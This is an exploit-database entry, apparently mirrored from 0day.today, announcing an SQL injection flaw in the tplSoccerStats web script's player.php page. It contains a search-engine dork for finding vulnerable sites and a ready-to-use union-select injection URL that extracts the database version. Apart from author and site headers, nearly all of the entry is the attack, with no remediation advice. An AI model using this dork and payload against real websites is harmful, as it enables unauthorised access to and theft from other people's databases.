id: 15468
date: 02/24/2011
title: tplSoccerStats (player.php) SQL Injection Vulnerability
author: AtT4CKxT3rR0r1ST
cves: 

####################################################################
.:. Author         : AtT4CKxT3rR0r1ST  [F.Hack@w.cn]
.:. Dork           : intitle:"Powered by tplSoccerStats" inurl:"player.php"
.:. Home           : http://www.sec-risk.com/vb/
####################################################################
 
===[ Exploit ]===
 
www.site.com/player.php?id==null[Sql]
 
www.site.com/player.php?id=null'+and+1=2+union+select+1,2,3,version(),5,6,7,8,9,10-- -
####################################################################   



#  0day.today [2023-03-25]  #